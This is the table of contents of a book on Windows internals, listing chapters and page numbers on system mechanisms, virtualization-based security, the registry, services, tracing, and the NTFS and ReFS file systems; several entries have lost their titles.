Trap dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30
Interrupt dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32
Line-based versus message signaled–based interrupts . . . . . . . . . . .50
Timer processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .66
System worker threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Exception dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .85
System service handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
WoW64 (Windows-on-Windows). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .104
The WoW64 core . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
File system redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Registry redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
X86 simulation on AMD64 platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . .111
ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
viii
Contents
Memory models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
ARM32 simulation on ARM64 platforms . . . . . . . . . . . . . . . . . . . . . . . . 115
X86 simulation on ARM64 platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Object Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Executive objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Object structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
High-IRQL synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Low-IRQL synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Advanced local procedure call . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .209
Connection model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Message model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Asynchronous operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Views, regions, and sections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
Attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
Blobs, handles, and resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Handle passing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219
Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .220
Power management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221
ALPC direct event attribute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .222
Debugging and tracing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .222
Windows Notification Facility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .224
WNF features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .225
WNF users . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .226
WNF state names and storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .233
WNF event aggregation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .237
User-mode debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .239
Kernel support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .239
Native support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .240
Windows subsystem support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .242
Packaged applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .243
UWP applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .245
Centennial applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .246
Contents
ix
The Host Activity Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .249
The State Repository . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251
The Dependency Mini Repository . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .255
Background tasks and the Broker Infrastructure . . . . . . . . . . . . . . . . .256
Packaged applications setup and startup . . . . . . . . . . . . . . . . . . . . . . .258
Package activation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .259
Package registration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .265
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .266
Chapter 9
Virtualization technologies
267
The Windows hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .267
Partitions, processes, and threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .269
The hypervisor startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .274
The hypervisor memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .279
Hyper-V schedulers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .287
Hypercalls and the hypervisor TLFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . .299
Intercepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .300
The synthetic interrupt controller (SynIC) . . . . . . . . . . . . . . . . . . . . . . . 301
The Windows hypervisor platform API and EXO partitions . . . . . . .304
Nested virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .307
The Windows hypervisor on ARM64 . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
The virtualization stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Virtual machine manager service and worker processes . . . . . . . . . 315
The VID driver and the virtualization stack memory manager . . . . 317
The birth of a Virtual Machine (VM) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
VMBus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .323
Virtual hardware support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .329
VA-backed virtual machines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .336
Virtualization-based security (VBS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .340
Virtual trust levels (VTLs) and Virtual Secure Mode (VSM) . . . . . . . .340
Services provided by the VSM and requirements . . . . . . . . . . . . . . . .342
The Secure Kernel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .345
Virtual interrupts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .345
Secure intercepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .348
x
Contents
VSM system calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .349
Secure threads and scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .356
The Hypervisor Enforced Code Integrity . . . . . . . . . . . . . . . . . . . . . . . .358
UEFI runtime virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .358
VSM startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .360
The Secure Kernel memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . .363
Hot patching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .368
Isolated User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Trustlets creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .372
Secure devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .376
VBS-based enclaves . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .378
System Guard runtime attestation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .386
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .390
Chapter 10 Management, diagnostics, and tracing
391
The registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Viewing and changing the registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Registry usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .392
Registry data types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .393
Registry logical structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .394
Application hives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .402
Transactional Registry (TxR) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .403
Monitoring registry activity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Process Monitor internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .405
Registry internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406
Hive reorganization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
The registry namespace and operation . . . . . . . . . . . . . . . . . . . . . . . . . 415
Stable storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
Registry filtering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .422
Registry virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .422
Registry optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .425
Windows services. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .426
Service applications. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .426
Service accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .433
The Service Control Manager (SCM) . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
Contents
xi
Service control programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .450
Autostart services startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
Delayed autostart services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .457
Triggered-start services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .458
Startup errors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .459
Accepting the boot and last known good . . . . . . . . . . . . . . . . . . . . . . .460
Service failures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .462
Service shutdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 464
Shared service processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .465
Service tags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .468
User services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .469
Packaged services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .473
Protected services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .474
Task scheduling and UBPM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .475
The Task Scheduler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .476
. . . . . . . . . . . . . . . . . . 481
Task Scheduler COM interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .486
Windows Management Instrumentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .486
WMI architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .487
WMI providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .488
The Common Information Model and the Managed
Object Format Language . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .489
Class association . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .493
WMI implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .496
WMI security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .498
Event Tracing for Windows (ETW) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .499
ETW initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
ETW sessions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .502
ETW providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .506
Providing events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .509
ETW Logger thread . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511
Consuming events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 512
System loggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516
ETW security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .522
Dynamic tracing (DTrace) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .525
Internal architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .528
DTrace type library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .534
Windows Error Reporting (WER) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .535
User application crashes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .537
Kernel-mode (system) crashes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .543
Process hang detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 551
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .554
Kernel shims . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .557
Shim engine initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .557
The shim database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .559
Driver shims . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .560
Device shims . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .564
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .564
Chapter 11 Caching and file systems
565
Terminology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .565
Key features of the cache manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .566
Single, centralized system cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .567
The memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .567
Cache coherency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .568
Virtual block caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .569
Stream-based caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .569
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .570
NTFS MFT working set enhancements . . . . . . . . . . . . . . . . . . . . . . . . . . 571
Memory partitions support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 571
Cache virtual memory management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .572
Cache size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache virtual size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache working set size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache physical size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .576
Systemwide cache data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .576
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .579
File system interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .582
Copying to and from the cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .584
Caching with the mapping and pinning interfaces . . . . . . . . . . . . . . .584
Caching with the direct memory access interfaces . . . . . . . . . . . . . . .584
Fast I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .585
Read-ahead and write-behind . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .586
Intelligent read-ahead . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .587
Read-ahead enhancements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .588
Write-back caching and lazy writing . . . . . . . . . . . . . . . . . . . . . . . . . . . .589
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .595
Forcing the cache to write through to disk . . . . . . . . . . . . . . . . . . . . . .595
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .595
Write throttling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .596
System threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .597
Aggressive write behind and low-priority lazy writes . . . . . . . . . . . .598
Dynamic memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .599
Cache manager disk I/O accounting . . . . . . . . . . . . . . . . . . . . . . . . . . . .600
File systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
CDFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
UDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .603
FAT12, FAT16, and FAT32 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .603
exFAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .606
NTFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .606
ReFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
File system driver architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
Local FSDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
Remote FSDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 610
File system operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 619
. . . . . . . . . .622
Cache manager’s lazy writer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .622
Cache manager’s read-ahead thread . . . . . . . . . . . . . . . . . . . . . . . . . . .622
Memory manager’s page fault handler . . . . . . . . . . . . . . . . . . . . . . . . .623
. . . . . . . . . . . . . . . . . . . . . . . . . .623
Filtering named pipes and mailslots . . . . . . . . . . . . . . . . . . . . . . . . . . . .625
Controlling reparse point behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . .626
Process Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .627
The NT File System (NTFS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .628
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .628
Recoverability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .629
Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .629
Data redundancy and fault tolerance . . . . . . . . . . . . . . . . . . . . . . . . . . .629
Advanced features of NTFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .630
Multiple data streams . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
Unicode-based names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .633
General indexing facility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .633
Dynamic bad-cluster remapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .633
Hard links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .634
Symbolic (soft) links and junctions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .634
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .637
Change logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .637
Per-user volume quotas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .638
Link tracking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .639
Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 640
POSIX-style delete semantics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 641
Defragmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .643
Dynamic partitioning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .646
NTFS support for tiered volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .647
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .652
NTFS on-disk structure. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .654
Volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .655
Clusters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .655
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .656
File record numbers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .660
File records . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 661
File names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .664
Tunneling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .666
Resident and nonresident attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . .667
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .670
Compressing sparse data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 671
Compressing nonsparse data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .673
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .675
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .675
Indexing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .679
Object IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 681
Quota tracking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 681
Consolidated security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .682
Reparse points . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .684
Storage reserves and NTFS reservations . . . . . . . . . . . . . . . . . . . . . . . . .685
Transaction support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .688
Isolation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .689
Transactional APIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .690
On-disk implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 691
Logging implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .693
NTFS recovery support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .694
Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .694
Metadata logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .695
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .695
Log record types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .697
Recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .699
Analysis pass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .700
Redo pass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
Undo pass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
NTFS bad-cluster recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .703
Self-healing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .706
Online check-disk and fast repair . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .707
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 710
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 713
The decryption process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 715
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 716
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 717
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 717
Online encryption support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 719
Direct Access (DAX) disks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .720
DAX driver model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 721
DAX volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .722
Cached and noncached I/O in DAX volumes . . . . . . . . . . . . . . . . . . . .723
Mapping of executable images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .724
Block volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .728
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .730
Flushing DAX mode I/Os . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 731
Large and huge pages support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .732
Virtual PM disks and storage spaces support . . . . . . . . . . . . . . . . . . . .736
Resilient File System (ReFS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .739
Minstore architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .740
B+ tree physical layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .742
Allocators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .743
